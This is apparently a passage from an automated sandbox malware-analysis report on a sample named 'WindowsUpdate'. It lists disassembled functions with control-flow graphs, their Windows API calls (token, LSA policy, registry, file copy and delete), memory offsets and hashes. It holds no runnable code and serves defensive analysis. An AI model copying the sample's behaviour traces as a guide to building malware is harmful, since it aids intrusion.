                                                                                                                    • LsaOpenPolicy.ADVAPI32(?,00000E2C), ref: 0248B6EF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333655342.000000000248A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248A000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_248a000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: OpenPolicy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2030686058-0
                                                                                                                    • Opcode ID: 044a598ce29d24b8fcf6fb3af880f7051a84b617565cbf725cb1558f96e77319
                                                                                                                    • Instruction ID: 00f0697d06e2cb05ce96ab12a0a2b93c04c5dbf6cd829c7d42cabcf5ca55938f
                                                                                                                    • Opcode Fuzzy Hash: 044a598ce29d24b8fcf6fb3af880f7051a84b617565cbf725cb1558f96e77319
                                                                                                                    • Instruction Fuzzy Hash: 8E218F72504384AFEB21CB65DC85F6BFFB8EF05310F08889AED84DB252D225A508CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0248B342 Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 80 248b342-248b3c4 85 248b411-248b416 80->85 86 248b3c6-248b3ce GetTokenInformation 80->86 85->86 88 248b3d4-248b3e6 86->88 89 248b418-248b41d 88->89 90 248b3e8-248b40e 88->90 89->90
                                                                                                                    APIs
                                                                                                                    • GetTokenInformation.KERNELBASE(?,00000E2C,DD0169A6,00000000,00000000,00000000,00000000), ref: 0248B3CC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333655342.000000000248A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248A000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_248a000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InformationToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4114910276-0
                                                                                                                    • Opcode ID: b8e97eac8904eaea4d1cca71e4108a496eacefd72f6d38516227c9d2ff12c924
                                                                                                                    • Instruction ID: f7d96cc08c6528f21d81d78e57bb1e46c660dd09133e558ab5e77838df123c85
                                                                                                                    • Opcode Fuzzy Hash: b8e97eac8904eaea4d1cca71e4108a496eacefd72f6d38516227c9d2ff12c924
                                                                                                                    • Instruction Fuzzy Hash: B821A1715043806FEB228F65DC85FA7BBBCEF45310F0884ABE945DB252D264A508CBB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04E511D4 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 93 4e511d4-4e511e0 94 4e511e2-4e511f8 93->94 95 4e511fa-4e51261 93->95 94->95 99 4e51296-4e5129b 95->99 100 4e51263-4e51276 GetFileType 95->100 99->100 101 4e5129d-4e512a2 100->101 102 4e51278-4e51295 100->102 101->102
                                                                                                                    APIs
                                                                                                                    • GetFileType.KERNELBASE(?,00000E2C,DD0169A6,00000000,00000000,00000000,00000000), ref: 04E51269
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334087495.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4e50000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileType
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3081899298-0
                                                                                                                    • Opcode ID: 6055818bb6a270e03a5be8eea204afc028ea485f8e85534f690e8fb81daf4672
                                                                                                                    • Instruction ID: a09d7d0a9c2f4d9c2c926beedc4265643439f14d63cdcb67a5d597e4a2f68f42
                                                                                                                    • Opcode Fuzzy Hash: 6055818bb6a270e03a5be8eea204afc028ea485f8e85534f690e8fb81daf4672
                                                                                                                    • Instruction Fuzzy Hash: 4D21F8B54087806FE7128B25DC40FA3BFB8EF46720F1884DAED948B163D264A909C771
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04E510FE Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 119 4e510fe-4e51156 122 4e51158 119->122 123 4e5115b-4e51167 119->123 122->123 124 4e5116c-4e51175 123->124 125 4e51169 123->125 126 4e51177-4e5117f CreateFileW 124->126 127 4e511c6-4e511cb 124->127 125->124 128 4e51185-4e5119b 126->128 127->126 130 4e511cd-4e511d2 128->130 131 4e5119d-4e511c3 128->131 130->131
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 04E5117D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334087495.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4e50000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: 8c6567cc8831d78e337b573e84e9a95e4635de16bbfc1338ea02206ecaa05d15
                                                                                                                    • Instruction ID: 8604964e01f26ccae58fb0a8c917ad3a17bc7fae3e0cb508996df625c6709544
                                                                                                                    • Opcode Fuzzy Hash: 8c6567cc8831d78e337b573e84e9a95e4635de16bbfc1338ea02206ecaa05d15
                                                                                                                    • Instruction Fuzzy Hash: 1521AE71A00240AFEB21DF65CD85B66FBE8EF08314F0485AEED858B252D371F408CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04E51A0B Relevance: 1.6, APIs: 1, Instructions: 76windowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 134 4e51a0b-4e51a95 137 4e51a97-4e51aaa PostMessageW 134->137 138 4e51acb-4e51ad0 134->138 139 4e51ad2-4e51ad7 137->139 140 4e51aac-4e51ac8 137->140 138->137 139->140
                                                                                                                    APIs
                                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 04E51A9D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334087495.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4e50000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 410705778-0
                                                                                                                    • Opcode ID: dbd0bebd00d497caebe37f1bb19e1d3f9b333a136c0a3eb4f7239b8e26187f0a
                                                                                                                    • Instruction ID: 75f5694641ba18c19d4c3c219a49196fda9d26b366cfdcd585f5d019eb8c7a75
                                                                                                                    • Opcode Fuzzy Hash: dbd0bebd00d497caebe37f1bb19e1d3f9b333a136c0a3eb4f7239b8e26187f0a
                                                                                                                    • Instruction Fuzzy Hash: 99216B7140E7C05FD7138B25DC95A52BFB4AF07224B0D84DBED858F1A3D266A818DB62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04E50310 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 106 4e50310-4e5037a 108 4e5037c 106->108 109 4e5037f-4e50388 106->109 108->109 110 4e5038d-4e50399 109->110 111 4e5038a 109->111 112 4e503d3-4e503d8 110->112 113 4e5039b-4e503a3 GetTextExtentPoint32W 110->113 111->110 112->113 114 4e503a9-4e503bb 113->114 116 4e503bd-4e503d0 114->116 117 4e503da-4e503df 114->117 117->116
                                                                                                                    APIs
                                                                                                                    • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 04E503A1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334087495.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4e50000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExtentPoint32Text
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 223599850-0
                                                                                                                    • Opcode ID: 38e21ed88a866a703c9dfaad0f8e60e787981cb5df4f582bf8fd6db06be49518
                                                                                                                    • Instruction ID: e734eebb1033ed4abe85360bfe166a8e0fc0647fe3a321c0772ec37e04321581
                                                                                                                    • Opcode Fuzzy Hash: 38e21ed88a866a703c9dfaad0f8e60e787981cb5df4f582bf8fd6db06be49518
                                                                                                                    • Instruction Fuzzy Hash: BC214C715093805FD7228F65DC55B62BFF8EF46224F0984DBEC84CB263D269A809CB62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04E512A4 Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 143 4e512a4-4e5132d 147 4e51371-4e51376 143->147 148 4e5132f-4e5134f WriteFile 143->148 147->148 151 4e51351-4e5136e 148->151 152 4e51378-4e5137d 148->152 152->151
                                                                                                                    APIs
                                                                                                                    • WriteFile.KERNELBASE(?,00000E2C,DD0169A6,00000000,00000000,00000000,00000000), ref: 04E51335
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334087495.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4e50000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3934441357-0
                                                                                                                    • Opcode ID: 69d2d27f2e59f6fb9b55906930cd754851c8eb6c4acc17673548b2a44ea0e604
                                                                                                                    • Instruction ID: 7a56d5621fb2a21793c0313c9ef041ce60916092ad241dba4e948681324331b4
                                                                                                                    • Opcode Fuzzy Hash: 69d2d27f2e59f6fb9b55906930cd754851c8eb6c4acc17673548b2a44ea0e604
                                                                                                                    • Instruction Fuzzy Hash: E32192714093806FDB228F65DC45F66FFB8EF46314F0984DBE9849B163C265A509CB62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0248AB56 Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 155 248ab56-248abb1 158 248abb3 155->158 159 248abb6-248abcd 155->159 158->159 161 248ac0f-248ac14 159->161 162 248abcf-248abe2 RegOpenKeyExW 159->162 161->162 163 248abe4-248ac0c 162->163 164 248ac16-248ac1b 162->164 164->163
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 0248ABD5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333655342.000000000248A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248A000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_248a000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Open
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 71445658-0
                                                                                                                    • Opcode ID: 8bf60d3a730748b2599a0eee486a1e6d67d566297396530fcc9cf95e8dbf2ae6
                                                                                                                    • Instruction ID: ef1aa7b0ac3e09a6d29a00dbade2338f1ca279ceed5763989eefd8abdc61494e
                                                                                                                    • Opcode Fuzzy Hash: 8bf60d3a730748b2599a0eee486a1e6d67d566297396530fcc9cf95e8dbf2ae6
                                                                                                                    • Instruction Fuzzy Hash: 9621AE72500604AFEB21AF55CC84F6BFBECEF04320F14885BEE819B241D6A4E549CBB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0248B67E Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 169 248b67e-248b6d9 172 248b6db 169->172 173 248b6de-248b6e7 169->173 172->173 174 248b6e9-248b6f1 LsaOpenPolicy 173->174 175 248b736-248b73b 173->175 177 248b6f7-248b709 174->177 175->174 178 248b70b-248b733 177->178 179 248b73d-248b742 177->179 179->178
                                                                                                                    APIs
                                                                                                                    • LsaOpenPolicy.ADVAPI32(?,00000E2C), ref: 0248B6EF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333655342.000000000248A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248A000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_248a000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: OpenPolicy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2030686058-0
                                                                                                                    • Opcode ID: 143ee4753654b5a0cc1f51803ba86591d42ff6d6f9e06dcbf0b81886d716a4b7
                                                                                                                    • Instruction ID: f363ebfb8e3b454d797fdedf6e87b79e3f0e8eb35f5d1f1bddc115c3e1189833
                                                                                                                    • Opcode Fuzzy Hash: 143ee4753654b5a0cc1f51803ba86591d42ff6d6f9e06dcbf0b81886d716a4b7
                                                                                                                    • Instruction Fuzzy Hash: 47219D71500704AFEB20AB69DC85F6BFBA8EF04710F18886BED84DA241D664A5098BB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04E5137F Relevance: 1.6, APIs: 1, Instructions: 71fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 183 4e5137f-4e513e1 185 4e513e6-4e513ec 183->185 186 4e513e3 183->186 187 4e513f1-4e513fa 185->187 188 4e513ee 185->188 186->185 189 4e5143d-4e51442 187->189 190 4e513fc-4e5141c CopyFileW 187->190 188->187 189->190 193 4e51444-4e51449 190->193 194 4e5141e-4e5143a 190->194 193->194
                                                                                                                    APIs
                                                                                                                    • CopyFileW.KERNELBASE(?,?,?), ref: 04E51402
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334087495.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4e50000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CopyFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1304948518-0
                                                                                                                    • Opcode ID: eed6cf070f89abc0bb9571be3d9cbb4e32da368e950cef199f50f3ed5e5195c6
                                                                                                                    • Instruction ID: ee98f2201fbe362276263804e9b27a5f6e912a0904f7e0b9600c57d544446de5
                                                                                                                    • Opcode Fuzzy Hash: eed6cf070f89abc0bb9571be3d9cbb4e32da368e950cef199f50f3ed5e5195c6
                                                                                                                    • Instruction Fuzzy Hash: DE2183B15093805FD722CF25DC55B62FFA8AF46314F0980EAED84CB253D265E804CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0248AC5E Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 196 248ac5e-248ac9b 198 248ac9d 196->198 199 248aca0-248aca9 196->199 198->199 200 248acab 199->200 201 248acae-248acb4 199->201 200->201 202 248acb9-248acd0 201->202 203 248acb6 201->203 205 248acd2-248ace5 RegQueryValueExW 202->205 206 248ad07-248ad0c 202->206 203->202 207 248ad0e-248ad13 205->207 208 248ace7-248ad04 205->208 206->205 207->208
                                                                                                                    APIs
                                                                                                                    • RegQueryValueExW.KERNELBASE(?,00000E2C,DD0169A6,00000000,00000000,00000000,00000000), ref: 0248ACD8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333655342.000000000248A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248A000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_248a000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: QueryValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3660427363-0
                                                                                                                    • Opcode ID: 5e87f194bda9cd7ca8e169e8338ea42f1668ac1ed418efb4355d424e4a7d8367
                                                                                                                    • Instruction ID: 4467cc443ce6cae8772a718f197183ae26564b0a8f853adf0b0c679515ef3fa1
                                                                                                                    • Opcode Fuzzy Hash: 5e87f194bda9cd7ca8e169e8338ea42f1668ac1ed418efb4355d424e4a7d8367
                                                                                                                    • Instruction Fuzzy Hash: 83214A75600604AFEB20DF15DC84F6BBBECEF04710F1884ABEA45DB251D7A5E449CA71
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0248B362 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetTokenInformation.KERNELBASE(?,00000E2C,DD0169A6,00000000,00000000,00000000,00000000), ref: 0248B3CC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333655342.000000000248A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248A000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_248a000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InformationToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4114910276-0
                                                                                                                    • Opcode ID: b61cbfde177fe1a5f1334c7f5106d0f5964796e2106c9ded4a6f3da9445b205c
                                                                                                                    • Instruction ID: 38b57e92768d59cbc31be8998159dd1a34368f1e80bed03cf7242dd362de5947
                                                                                                                    • Opcode Fuzzy Hash: b61cbfde177fe1a5f1334c7f5106d0f5964796e2106c9ded4a6f3da9445b205c
                                                                                                                    • Instruction Fuzzy Hash: 6B11CD71500200AFEB219F65DC81FABBBACEF04324F14846BED45CB241D674A409CBB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04E51013 Relevance: 1.6, APIs: 1, Instructions: 68fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DeleteFileW.KERNELBASE(?), ref: 04E51084
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334087495.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4e50000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4033686569-0
                                                                                                                    • Opcode ID: 16ba3a61593c444e7a72d333437e1f7f38db49c97980010969886c3ca90b0b0f
                                                                                                                    • Instruction ID: be554277029e4e524f596d313c8d307fe7074e7b0717b5b1b62e39cc4497d8ed
                                                                                                                    • Opcode Fuzzy Hash: 16ba3a61593c444e7a72d333437e1f7f38db49c97980010969886c3ca90b0b0f
                                                                                                                    • Instruction Fuzzy Hash: E92162B55093805FD7128F25DC45B52BFA8EF46214F0980DBED45CF2A3D265A908CB62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0248BAB5 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 0248BB31
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333655342.000000000248A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248A000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_248a000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoadShim
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1475914169-0
                                                                                                                    • Opcode ID: 1f6dd9ab235234dde0bc3fa62cc85308785c132f155985103831d5c3e9e83b1b
                                                                                                                    • Instruction ID: 71d088c405fefedfafc768bd48726ac3a75ac6bdc9ed7fee3026dca4e87ab2dd
                                                                                                                    • Opcode Fuzzy Hash: 1f6dd9ab235234dde0bc3fa62cc85308785c132f155985103831d5c3e9e83b1b
                                                                                                                    • Instruction Fuzzy Hash: 172190755093846FD7228E15DC84B63BFF8EF46214F08809AED84CB293D365A908CB62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0248A5AF Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0248A61A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333655342.000000000248A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248A000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_248a000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: 1fc4b2d9aad3fa4a3d789c33f79305323f80718fa48e509671da80a3e0248882
                                                                                                                    • Instruction ID: b8c6f03ea11e37c81f3ada4d426b4223b8d8fe2c9551972123033ff43281c3e8
                                                                                                                    • Opcode Fuzzy Hash: 1fc4b2d9aad3fa4a3d789c33f79305323f80718fa48e509671da80a3e0248882
                                                                                                                    • Instruction Fuzzy Hash: D6117271409380AFDB228F55DC44B62FFF4EF4A610F0884DBED858B262D275A418DB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04E512D6 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WriteFile.KERNELBASE(?,00000E2C,DD0169A6,00000000,00000000,00000000,00000000), ref: 04E51335
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334087495.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4e50000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3934441357-0
                                                                                                                    • Opcode ID: b77cc83cdb399671277dd057191ba32f546b0ecaf9b47ca4f6ce20d25c3dcee3
                                                                                                                    • Instruction ID: 1b036e3202e6d3e7664289acf035d5e98483128b7e2937aaece649489836d7a3
                                                                                                                    • Opcode Fuzzy Hash: b77cc83cdb399671277dd057191ba32f546b0ecaf9b47ca4f6ce20d25c3dcee3
                                                                                                                    • Instruction Fuzzy Hash: AC11C471900340AFEB31CF55DC80FA6FBE8EF44710F1484AAED859B651D675A409CB71
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0248A65A Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNELBASE(?), ref: 0248A6CC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333655342.000000000248A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248A000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_248a000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2340568224-0
                                                                                                                    • Opcode ID: f9e356fdec3ddb7d219316f4b28213e31d3d453c05418bc6a1a39b0dd01c6de1
                                                                                                                    • Instruction ID: 80ff7a8947afdbd9ee2103d04ee5b228057cae893e4a7fa945a253fdca577b43
                                                                                                                    • Opcode Fuzzy Hash: f9e356fdec3ddb7d219316f4b28213e31d3d453c05418bc6a1a39b0dd01c6de1
                                                                                                                    • Instruction Fuzzy Hash: 931159758093C49FDB128B25CC94A52BFB4DF07620F0A80DBDD859F2A3D2A95948CB72
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0248A2D6 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 0248A32C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333655342.000000000248A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248A000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_248a000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2591292051-0
                                                                                                                    • Opcode ID: 51cd83259a645fe367f60d116e9316e5cd795c4c9828f7efbbc0ee8982730dab
                                                                                                                    • Instruction ID: 839ea335eb451f1a0747da6e9ac8fb82a901158955ae684ca7c7b1b490332532
                                                                                                                    • Opcode Fuzzy Hash: 51cd83259a645fe367f60d116e9316e5cd795c4c9828f7efbbc0ee8982730dab
                                                                                                                    • Instruction Fuzzy Hash: A31154715093809FDB128F25DC95B56BFB8DF46220F0884EBED858F652D2759908CB62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04E513BA Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CopyFileW.KERNELBASE(?,?,?), ref: 04E51402
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334087495.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4e50000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CopyFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1304948518-0
                                                                                                                    • Opcode ID: 2f11c1b8c5f122ca2e4d5f8fc67f470dd2b636130b7bb8d214d46d170e5ea90d
                                                                                                                    • Instruction ID: 83493ee0e546747f0c1ec52b831216d4437c96f912c92bedd2ddb0d253e56f9b
                                                                                                                    • Opcode Fuzzy Hash: 2f11c1b8c5f122ca2e4d5f8fc67f470dd2b636130b7bb8d214d46d170e5ea90d
                                                                                                                    • Instruction Fuzzy Hash: D511A175A006408FDB20CF69DC85B66FBE8EF04320F08D4AADC49CB652E674E448CB72
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04E51216 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileType.KERNELBASE(?,00000E2C,DD0169A6,00000000,00000000,00000000,00000000), ref: 04E51269
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.334087495.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_4e50000_WindowsUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileType
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3081899298-0
                                                                                                                    • Opcode ID: 9a37c9c2307328f25da796fd40ef65a5167229fcc981211ad4b4957b6d6c2f05
                                                                                                                    • Instruction ID: c88da54e1746754b8852eb1e689948fd9f5ef9311c1d0ddacf84a600720b8c68
                                                                                                                    • Opcode Fuzzy Hash: 9a37c9c2307328f25da796fd40ef65a5167229fcc981211ad4b4957b6d6c2f05
                                                                                                                    • Instruction Fuzzy Hash: 38012235900200AFEB20CF19DC80FB6FBE8DF44320F14C49AED449B291D6B8B409CAB2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 04E50A7F Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON
